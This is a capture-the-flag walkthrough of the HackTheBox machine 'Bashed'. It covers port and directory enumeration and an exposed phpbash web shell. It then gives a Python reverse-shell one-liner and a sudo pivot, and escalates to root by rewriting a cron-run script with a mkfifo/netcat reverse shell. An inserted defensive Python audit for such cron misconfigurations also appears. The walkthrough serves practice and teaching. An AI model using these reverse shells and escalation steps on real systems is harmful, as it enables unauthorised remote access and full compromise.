HackTheBox | Bashed

In this walkthrough, I demonstrate how I obtained complete ownership of Bashed on HackTheBox
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.93 scan initiated Wed Mar 29 00:20:11 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt
Nmap scan report for
Host is up (0.014s latency).
Not shown: 65534 closed tcp ports (reset)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
1   12.31 ms
2   12.42 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 00:20:34 2023 -- 1 IP address (1 host up) scanned in 23.26 seconds

Service Enumeration


Interesting mention of 'phpbash'
gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 100 -o gobuster.txt

/about.html           (Status: 200) [Size: 8193]
/config.php           (Status: 200) [Size: 0]
/contact.html         (Status: 200) [Size: 7805]
/css                  (Status: 200) [Size: 1759]
/dev                  (Status: 200) [Size: 1149]
/fonts                (Status: 200) [Size: 2096]
/images               (Status: 200) [Size: 1565]
/index.html           (Status: 200) [Size: 7743]
/js                   (Status: 200) [Size: 3166]
/php                  (Status: 200) [Size: 940]
/scroll.html          (Status: 200) [Size: 10863]
/single.html          (Status: 200) [Size: 7477]
/uploads              (Status: 200) [Size: 14]

Looking at the output, the most immediately interesting resources are:

  • /dev/
  • /php/
  • /uploads

And just like that, we found the phpbash.php script:

Great, so we've got command execution on the target! Let's see if I can ping my VPN IP.

Excellent! We can communicate back to my Kali instance, so the prospects of a reverse shell have become that much more promising. Netcat is installed on the target, but does not support the -e parameter.

Python is installed on the target


The system administrator left a sensitive development directory on the web server globally readable. This directory contains a PHP script that allows an unauthenticated user to execute arbitrary commands on the remote server. This directory should not be globally readable, and ideally the development environment should be isolated in a non-public network.

Reverse Shell

Attack Box

sudo rlwrap nc -lnvp 80


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<vpn-ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Substitute '<vpn-ip>' and '<port>' with the appropriate values

Post-Exploit Enumeration

Operating Environment

OS & Kernel

VERSION="16.04.2 LTS (Xenial Xerus)"
PRETTY_NAME="Ubuntu 16.04.2 LTS"
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Users and Groups

Local Users


Local Groups



Network Configurations


ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:4b:66 brd ff:ff:ff:ff:ff:ff
    inet brd scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4b66/64 scope global mngtmpaddr dynamic 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:4b66/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

All open ports previously enumerated.

Interesting Files


Permission denied (see privilege escalation)


Permission denied (see privilege escalation)

Privilege Escalation

Lateral Pivot

The most obvious privilege escalation path from the initial access is the sudo -l output shown above under Current User: we can run any command as the user scriptmanager without a password. We can use this to spawn a Bash sub-process as the user scriptmanager.

sudo -u scriptmanager /bin/bash -ip

Spawn a Bash shell as the user 'scriptmanager'

More Enumeration

From before, we found the interesting /scripts directory, which is owned by the scriptmanager user.

Read 'test.py'
Read 'test.txt'

There's nothing particularly useful about this script at first glance. It just opens a file in write mode and writes the text "testing 123!" to it. But you'll notice that the test.txt file it writes to is owned by root.

That would lead me to believe that the root user has a cron job that runs this script at regular intervals, allowing us to control which file is read and written to using this script.
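As an added defensive example (not part of the original writeup), the following audit flags the misconfiguration exploited here: a root cron entry that executes a file, or lives in a directory, that a non-root user owns or can write. The cron line, the stat data and the uid 1001 for scriptmanager are constructed assumptions; the page never shows the actual cron entry.

```python
import os
import shlex
import stat
# Constructed /etc/crontab-style text; the page only infers that root runs this script.
SAMPLE_CRONTAB = """\
* * * * *   root    python /scripts/test.py
"""
OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH

def root_cron_commands(text):
    """Commands run as root from system-crontab lines (field 6 is the user)."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) == 7 and fields[5] == "root" and not line.lstrip().startswith("#"):
            yield fields[6]

def absolute_paths(command):
    """Absolute paths a command references, e.g. the script handed to an interpreter."""
    return [t for t in shlex.split(command) if t.startswith("/") and t != "/"]

def check_target(path, st, dir_st):
    """Findings for one file root executes: its owner and write bits, then its directory's."""
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid} but executed as root")
    if st.st_mode & OTHER_WRITE:
        findings.append(f"{path}: group/world writable ({stat.filemode(st.st_mode)})")
    if dir_st.st_uid != 0 or dir_st.st_mode & OTHER_WRITE:
        findings.append(f"{os.path.dirname(path)}: a non-root user can replace its entries")
    return findings

def audit(crontab_text, stat_fn=os.stat):
    """Audit every absolute path in root cron entries; stat_fn is injectable for sample data."""
    findings = []
    for command in root_cron_commands(crontab_text):
        for path in absolute_paths(command):
            try:
                st, dir_st = stat_fn(path), stat_fn(os.path.dirname(path))
            except (OSError, KeyError):
                continue  # path absent on this host (or in the sample table): nothing to check
            findings += check_target(path, st, dir_st)
    return findings

def constructed_stat(mode, uid):
    """os.stat_result for sample data (constructed, not read from disk)."""
    return os.stat_result((mode, 0, 0, 1, uid, uid, 0, 0, 0, 0))

# Assumed layout of this box: /scripts and test.py owned by scriptmanager (uid 1001 assumed).
SAMPLE_FS = {"/scripts": constructed_stat(stat.S_IFDIR | 0o755, 1001),
             "/scripts/test.py": constructed_stat(stat.S_IFREG | 0o644, 1001)}
```

Running audit over the sample table reports both the script's owner and the directory it sits in, which is why fixing the file's ownership alone would not close the hole; running it with the default stat_fn audits the live host.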

Test Script Modifications

Let's give it a test:

cd /scripts
cp test.py test.py.orig
sed -i 's/testing\ 123\!/0xBEN was here/' test.py

Overwrite 'testing 123!' with '0xBEN was here'

Then, we'll give it a minute or more to see if the file is overwritten with our new content.

Excellent! We can use this script to get a reverse shell as root.

Reverse Shell as Root

echo -e 'import os\nos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [vpn-ip] [port] >/tmp/f")' > test.py

Replace [vpn-ip] and [port] with your respective values
